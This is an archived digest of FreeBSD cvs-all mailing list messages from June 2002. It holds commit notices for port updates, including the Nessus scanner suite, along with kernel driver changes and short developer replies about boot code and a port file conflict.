pkg-plist ports/security/nessus-libnasl/files patch-aa ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG olgeni 2002/06/19 04:13:16 PDT Modified files: security/nessus Makefile distinfo pkg-plist security/nessus-libnasl Makefile distinfo pkg-plist security/nessus-libraries Makefile distinfo pkg-plist security/nessus-libraries/files patch-aa security/nessus-plugins Makefile distinfo pkg-plist Added files: security/nessus/files patch-aa patch-ab security/nessus-libnasl/files patch-aa security/nessus-libraries/files patch-ab patch-ac Removed files: security/nessus/files patch-ag patch-nessus-html_graph_output.c Log: Update nessus suite to version 1.2.2, from security/nessus-*-devel ports. Give maintainership to udo.schweigert@siemens.com, who already maintains the -devel ports. Revision Changes Path 1.22 +6 -6 ports/security/nessus-libnasl/Makefile 1.13 +1 -1 ports/security/nessus-libnasl/distinfo 1.1 +12 -0 ports/security/nessus-libnasl/files/patch-aa (new) 1.5 +2 -1 ports/security/nessus-libnasl/pkg-plist 1.23 +3 -3 ports/security/nessus-libraries/Makefile 1.14 +1 -1 ports/security/nessus-libraries/distinfo 1.2 +10 -11 ports/security/nessus-libraries/files/patch-aa 1.1 +12 -0 ports/security/nessus-libraries/files/patch-ab (new) 1.1 +15 -0 ports/security/nessus-libraries/files/patch-ac (new) 1.9 +8 -12 ports/security/nessus-libraries/pkg-plist 1.22 +19 -8 ports/security/nessus-plugins/Makefile 1.14 +1 -1 ports/security/nessus-plugins/distinfo 1.16 +336 -38 ports/security/nessus-plugins/pkg-plist 1.29 +14 -10 ports/security/nessus/Makefile 1.14 +1 -1 ports/security/nessus/distinfo 1.1 +13 -0 ports/security/nessus/files/patch-aa (new) 1.1 +13 -0 ports/security/nessus/files/patch-ab (new) 1.5 +0 -37 ports/security/nessus/files/patch-ag (dead) 1.2 +0 -31 ports/security/nessus/files/patch-nessus-html_graph_output.c (dead) 1.11 +15 -4 ports/security/nessus/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 4:14:25 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4907337B40E; Wed, 19 Jun 2002 04:14:21 -0700 (PDT) Received: (from olgeni@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JBEL273652; Wed, 19 Jun 2002 04:14:21 -0700 (PDT) (envelope-from olgeni) Message-Id: <200206191114.g5JBEL273652@freefall.freebsd.org> From: Jimmy Olgeni Date: Wed, 19 Jun 2002 04:14:21 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/security/nessus-devel Makefile ports/security/nessus-libnasl-devel Makefile ports/security/nessus-libraries-devel Makefile ports/security/nessus-plugins-devel Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG olgeni 2002/06/19 04:14:21 PDT Modified files: security/nessus-devel Makefile security/nessus-libnasl-devel Makefile security/nessus-libraries-devel Makefile security/nessus-plugins-devel Makefile Log: Mark FORBIDDEN: stable version is now available from security/nessus* and there's no -devel branch yet. Revision Changes Path 1.42 +2 -0 ports/security/nessus-devel/Makefile 1.33 +2 -0 ports/security/nessus-libnasl-devel/Makefile 1.33 +2 -0 ports/security/nessus-libraries-devel/Makefile 1.34 +2 -0 ports/security/nessus-plugins-devel/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 5: 4:29 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5D71337B40C; Wed, 19 Jun 2002 05:04:22 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JC4Mu79164; Wed, 19 Jun 2002 05:04:22 -0700 (PDT) (envelope-from tjr) Message-Id: <200206191204.g5JC4Mu79164@freefall.freebsd.org> From: "Tim J. Robbins" Date: Wed, 19 Jun 2002 05:04:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/bin/sh sh.1 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/19 05:04:22 PDT Modified files: bin/sh sh.1 Log: Bring documentation on CDPATH and its effects on cd(1) back into sync with reality (and POSIX): current directory isn't searched unless CDPATH has a "." element or is unset. PR: 38442 Submitted by: oleg dashevskii MFC after: 1 week Revision Changes Path 1.69 +6 -4 src/bin/sh/sh.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 5:13: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from anchor-post-34.mail.demon.net (anchor-post-34.mail.demon.net [194.217.242.92]) by hub.freebsd.org (Postfix) with ESMTP id B411137B40B; Wed, 19 Jun 2002 05:13:05 -0700 (PDT) Received: from mailgate.nlsystems.com ([62.49.251.130] helo=herring.nlsystems.com) by anchor-post-34.mail.demon.net with esmtp (Exim 3.35 #1) id 17KdT9-000Onw-0Y; Wed, 19 Jun 2002 12:17:47 +0100 Received: from herring (herring [10.0.0.2]) by herring.nlsystems.com (8.12.3/8.11.2) with ESMTP id g5JBHjOW010689; Wed, 19 Jun 2002 12:17:45 +0100 (BST) (envelope-from dfr@nlsystems.com) Date: Wed, 19 Jun 2002 12:17:45 +0100 (BST) From: Doug Rabson To: Poul-Henning Kamp Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: src/sys/boot/common ufsread.c src/sys/boot/sparc64/boot1 Makefile boot1.c In-Reply-To: <200206051200.g55C0rT50223@freefall.freebsd.org> Message-ID: <20020619121702.S10372-100000@herring.nlsystems.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, 5 Jun 2002, Poul-Henning Kamp wrote: > phk 2002/06/05 05:00:53 PDT > > Modified files: > sys/boot/common ufsread.c > sys/boot/sparc64/boot1 Makefile boot1.c > Log: > Make sparc64 share ufsread.c with i386. Is it possible to do this for alpha too? Might be tricky since alpha has some tight space limitations for boot1. -- Doug Rabson Mail: dfr@nlsystems.com Phone: +44 20 8348 6160 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 5:24:11 2002 Delivered-To: cvs-all@freebsd.org Received: from srv1.cosmo-project.de (srv1.cosmo-project.de [213.83.6.106]) by hub.freebsd.org (Postfix) with ESMTP id D052B37B400; Wed, 19 Jun 2002 05:23:35 -0700 (PDT) Received: from cicely5.cicely.de (cicely5.cicely.de [IPv6:3ffe:400:8d0:301:200:92ff:fe9b:20e7]) (authenticated bits=0) by srv1.cosmo-project.de (8.12.3/8.12.3) with ESMTP id g5JCNUSc048735 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK); Wed, 19 Jun 2002 14:23:33 +0200 (CEST) (envelope-from ticso@cicely5.cicely.de) Received: from cicely5.cicely.de (localhost [IPv6:::1]) by cicely5.cicely.de (8.12.1/8.12.1) with ESMTP id g5JCNRFJ007883 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Wed, 19 Jun 2002 14:23:28 +0200 (CEST)?g (envelope-from ticso@cicely5.cicely.de) Received: (from ticso@localhost) by cicely5.cicely.de (8.12.1/8.12.1/Submit) id g5JCNRck007882; Wed, 19 Jun 2002 14:23:27 +0200 (CEST)?g (envelope-from ticso) Date: Wed, 19 Jun 2002 14:23:27 +0200 From: Bernd Walter To: Doug Rabson Cc: Poul-Henning Kamp , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/boot/common ufsread.c src/sys/boot/sparc64/boot1 Makefile boot1.c Message-ID: <20020619122327.GJ43253@cicely5.cicely.de> Reply-To: ticso@cicely.de References: <200206051200.g55C0rT50223@freefall.freebsd.org> <20020619121702.S10372-100000@herring.nlsystems.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020619121702.S10372-100000@herring.nlsystems.com> User-Agent: Mutt/1.3.99i X-Operating-System: FreeBSD cicely5.cicely.de 5.0-CURRENT i386 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, Jun 19, 2002 at 12:17:45PM +0100, Doug Rabson wrote: > On Wed, 5 Jun 2002, Poul-Henning Kamp wrote: > > > phk 2002/06/05 05:00:53 PDT > > > > Modified files: > > sys/boot/common ufsread.c > > sys/boot/sparc64/boot1 Makefile boot1.c > > Log: > > Make sparc64 share ufsread.c with i386. > > Is it possible to do this for alpha too? Might be tricky since alpha has > some tight space limitations for boot1. It's already done. See rev 1.11 of sys/boot/alpha/boot1/boot1.c -- B.Walter COSMO-Project http://www.cosmo-project.de ticso@cicely.de Usergroup info@cosmo-project.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 5:25:14 2002 Delivered-To: cvs-all@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 26FB737B401; Wed, 19 Jun 2002 05:25:06 -0700 (PDT) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.12.3/8.12.2) with ESMTP id g5JCNIIj082522; Wed, 19 Jun 2002 14:23:19 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Doug Rabson Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/boot/common ufsread.c src/sys/boot/sparc64/boot1 Makefile boot1.c In-Reply-To: Your message of "Wed, 19 Jun 2002 12:17:45 BST." <20020619121702.S10372-100000@herring.nlsystems.com> Date: Wed, 19 Jun 2002 14:23:18 +0200 Message-ID: <82521.1024489398@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message <20020619121702.S10372-100000@herring.nlsystems.com>, Doug Rabson wr ites: >On Wed, 5 Jun 2002, Poul-Henning Kamp wrote: > >> phk 2002/06/05 05:00:53 PDT >> >> Modified files: >> sys/boot/common ufsread.c >> sys/boot/sparc64/boot1 Makefile boot1.c >> Log: >> Make sparc64 share ufsread.c with i386. > >Is it possible to do this for alpha too? Might be tricky since alpha has >some tight space limitations for boot1. We already do :-) -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 5:26:24 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CDC9B37B400; Wed, 19 Jun 2002 05:26:20 -0700 (PDT) Received: (from sos@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JCQK785855; Wed, 19 Jun 2002 05:26:20 -0700 (PDT) (envelope-from sos) Message-Id: <200206191226.g5JCQK785855@freefall.freebsd.org> From: Søren Schmidt Date: Wed, 19 Jun 2002 05:26:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/ata ata-dma.c ata-pci.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sos 2002/06/19 05:26:20 PDT Modified files: sys/dev/ata ata-dma.c ata-pci.c Log: Add yet another (older) Promise chip Revision Changes Path 1.99 +4 -2 src/sys/dev/ata/ata-dma.c 1.42 +6 -3 src/sys/dev/ata/ata-pci.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 5:35:58 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7648437B408; Wed, 19 Jun 2002 05:35:52 -0700 (PDT) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JCZqs86962; Wed, 19 Jun 2002 05:35:52 -0700 (PDT) (envelope-from sheldonh) Message-Id: <200206191235.g5JCZqs86962@freefall.freebsd.org> From: Sheldon Hearn Date: Wed, 19 Jun 2002 05:35:52 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/mod_perl Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sheldonh 2002/06/19 05:35:52 PDT Modified files: www/mod_perl Makefile distinfo Log: Update to mod_perl-1.27. The person who requested this change says that mail to the maintainer bounces. I have confirmed this. I will understand if the maintainer backs this change out and handles the update differently later. Requested by: Mars G Miro Revision Changes Path 1.19 +1 -1 ports/www/mod_perl/Makefile 1.7 +1 -1 ports/www/mod_perl/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 5:41:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5AA9337B406; Wed, 19 Jun 2002 05:41:05 -0700 (PDT) Received: (from sos@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JCf5387860; Wed, 19 Jun 2002 05:41:05 -0700 (PDT) (envelope-from sos) Message-Id: <200206191241.g5JCf5387860@freefall.freebsd.org> From: Søren Schmidt Date: Wed, 19 Jun 2002 05:41:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/ata atapi-fd.c atapi-fd.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sos 2002/06/19 05:41:05 PDT Modified files: sys/dev/ata atapi-fd.c atapi-fd.h Log: Use si_iosize_max to tell the upper layers not to use more than 32K chunks on ZIP drives instead of deblocking it in the driver. Revision Changes Path 1.73 +18 -43 src/sys/dev/ata/atapi-fd.c 1.17 +0 -1 src/sys/dev/ata/atapi-fd.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 5:45: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A108E37B409; Wed, 19 Jun 2002 05:45:04 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JCj4288391; Wed, 19 Jun 2002 05:45:04 -0700 (PDT) (envelope-from pat) Message-Id: <200206191245.g5JCj4288391@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 05:45:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/p5-Telnet-Cisco Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 05:45:04 PDT Modified files: net/p5-Telnet-Cisco Makefile distinfo Log: Update to 1.10 PR: 39486 Submitted by: Erwin Lansing Approved by: maintainer Revision Changes Path 1.3 +2 -1 ports/net/p5-Telnet-Cisco/Makefile 1.3 +1 -1 ports/net/p5-Telnet-Cisco/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 5:49:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 847CE37B409; Wed, 19 Jun 2002 05:49:01 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JCn1288805; Wed, 19 Jun 2002 05:49:01 -0700 (PDT) (envelope-from pat) Message-Id: <200206191249.g5JCn1288805@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 05:49:01 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/tmda Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 05:49:01 PDT Modified files: mail/tmda Makefile distinfo pkg-plist Log: Update to 0.57 PR: ports/39424 Submitted by: Jason R. Mastaler Approved by: maintainer Revision Changes Path 1.18 +1 -1 ports/mail/tmda/Makefile 1.17 +1 -1 ports/mail/tmda/distinfo 1.15 +4 -2 ports/mail/tmda/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 5:53:43 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 00C9437B409; Wed, 19 Jun 2002 05:53:41 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JCrev89787; Wed, 19 Jun 2002 05:53:40 -0700 (PDT) (envelope-from pat) Message-Id: <200206191253.g5JCrev89787@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 05:53:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc/pdftohtml Makefile pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 05:53:40 PDT Modified files: textproc/pdftohtml Makefile pkg-descr Log: - Fix typos in pkg-descr and dependencies - bump PORTREVISION PR: 39503 Submitted by: maintainer Revision Changes Path 1.6 +3 -1 ports/textproc/pdftohtml/Makefile 1.3 +2 -2 ports/textproc/pdftohtml/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6: 0: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6FAA037B40B; Wed, 19 Jun 2002 06:00:01 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JD01F90222; Wed, 19 Jun 2002 06:00:01 -0700 (PDT) (envelope-from pat) Message-Id: <200206191300.g5JD01F90222@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 06:00:01 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/sysutils/p5-Quota Makefile distinfo pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 06:00:01 PDT Modified files: sysutils/p5-Quota Makefile distinfo pkg-descr Log: Update to 1.4.3 Give maintainership to submitter Add WWW tag to pkg-descr PR: 39512 Submitted by: Erwin Lansing Revision Changes Path 1.5 +3 -3 ports/sysutils/p5-Quota/Makefile 1.4 +1 -1 ports/sysutils/p5-Quota/distinfo 1.2 +1 -0 ports/sysutils/p5-Quota/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6: 2:29 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 41BBF37B409; Wed, 19 Jun 2002 06:02:18 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JD2IC91007; Wed, 19 Jun 2002 06:02:18 -0700 (PDT) (envelope-from pat) Message-Id: <200206191302.g5JD2IC91007@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 06:02:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/sysutils/p5-Unix-Syslog Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 06:02:18 PDT Modified files: sysutils/p5-Unix-Syslog Makefile distinfo Log: Update to 0.97 Give maintainership to submitter PR: 39508 Submitted by: Erwin Lansing Revision Changes Path 1.5 +3 -3 ports/sysutils/p5-Unix-Syslog/Makefile 1.3 +1 -1 ports/sysutils/p5-Unix-Syslog/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6: 5:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D87E737B41F; Wed, 19 Jun 2002 06:05:02 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JD52m91475; Wed, 19 Jun 2002 06:05:02 -0700 (PDT) (envelope-from pat) Message-Id: <200206191305.g5JD52m91475@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 06:05:01 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/swish-e Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 06:05:01 PDT Modified files: www/swish-e Makefile Log: Update MASTER_SITES PR: ports/39506 Submitted by: maintainer Revision Changes Path 1.6 +2 -2 ports/www/swish-e/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6: 7:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freebsd.org.ru (sweet.etrust.ru [194.84.67.5]) by hub.freebsd.org (Postfix) with ESMTP id 7EEFE37B406; Wed, 19 Jun 2002 06:07:10 -0700 (PDT) Received: by freebsd.org.ru (Postfix, from userid 1000) id 05AB1E; Wed, 19 Jun 2002 17:07:04 +0400 (MSD) Date: Wed, 19 Jun 2002 17:07:04 +0400 From: "Sergey A. Osokin" To: Ade Lovett Cc: cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/databases/db33 Makefile distinfo pkg-comment pkg-descr pkg-plist ports/databases/db33/files patch-dist::Makefile.in patch-dist::configure Message-ID: <20020619130704.GB12325@freebsd.org.ru> References: <200206161557.g5GFvEw91624@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206161557.g5GFvEw91624@freefall.freebsd.org> User-Agent: Mutt/1.4i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, Jun 16, 2002 at 08:57:14AM -0700, Ade Lovett wrote: > ade 2002/06/16 08:57:14 PDT > > Modified files: > databases/db33 Makefile distinfo pkg-comment pkg-descr > pkg-plist > databases/db33/files patch-dist::Makefile.in > patch-dist::configure > Log: > Update to 3.3.11 after repo-copy, since the authors have made a number > of gratuitous API changes making a simple upgrade unreasonable. I think this port commit conflicts with databases/db3 port. Port db-3.2.9 installs files bin/db3_dump, include/db3/db.h. But port db-3.3.11 overwrites (probably already installed) bin/db3_dump, include/db3/db.h. Please mark this port as BROKEN. -- Rgdz, /"\ Sergey Osokin aka oZZ, \ / ASCII RIBBON CAMPAIGN osa@freebsd.org.ru X AGAINST HTML MAIL http://freebsd.org.ru/~osa/ / \ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6:17:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9F55737B404; Wed, 19 Jun 2002 06:17:43 -0700 (PDT) Received: (from nyan@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JDHh096929; Wed, 19 Jun 2002 06:17:43 -0700 (PDT) (envelope-from nyan) Message-Id: <200206191317.g5JDHh096929@freefall.freebsd.org> From: Takahashi Yoshihiro Date: Wed, 19 Jun 2002 06:17:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/pc98/pc98 fd.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nyan 2002/06/19 06:17:43 PDT Modified files: sys/pc98/pc98 fd.c Log: Merged from sys/isa/fd.c revision 1.233. Revision Changes Path 1.119 +28 -42 src/sys/pc98/pc98/fd.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6:20:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 886F237B40A; Wed, 19 Jun 2002 06:20:22 -0700 (PDT) Received: (from nyan@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JDKMj97476; Wed, 19 Jun 2002 06:20:22 -0700 (PDT) (envelope-from nyan) Message-Id: <200206191320.g5JDKMj97476@freefall.freebsd.org> From: Takahashi Yoshihiro Date: Wed, 19 Jun 2002 06:20:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/pc98/pc98 sio.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nyan 2002/06/19 06:20:22 PDT Modified files: sys/pc98/pc98 sio.c Log: Backout previous change and merge from sys/dev/sio/sio.c revision 1.375. Revision Changes Path 1.174 +23 -6 src/sys/pc98/pc98/sio.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6:24:14 2002 Delivered-To: cvs-all@freebsd.org Received: from watery.cc.kogakuin.ac.jp (watery.cc.kogakuin.ac.jp [133.80.152.80]) by hub.freebsd.org (Postfix) with ESMTP id C8CCE37B422; Wed, 19 Jun 2002 06:23:41 -0700 (PDT) Received: from localhost (localhost [IPv6:::1]) by watery.cc.kogakuin.ac.jp (8.12.3/8.12.3) with ESMTP id g5JDNeia032201; Wed, 19 Jun 2002 22:23:40 +0900 (JST) (envelope-from nyan@jp.FreeBSD.org) Date: Wed, 19 Jun 2002 22:23:14 +0900 (JST) Message-Id: <20020619.222314.74732759.nyan@jp.FreeBSD.org> To: n_hibma@FreeBSD.org Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/pc98/pc98 sio.c src/sys/conf options options.i386 options.ia64 options.pc98 src/sys/dev/sio sio.c sioreg.h From: Takahashi Yoshihiro In-Reply-To: <200206182130.g5ILUbI13355@freefall.freebsd.org> References: <200206182130.g5ILUbI13355@freefall.freebsd.org> X-Mailer: Mew version 2.2 on Emacs 21.2 / Mule 5.0 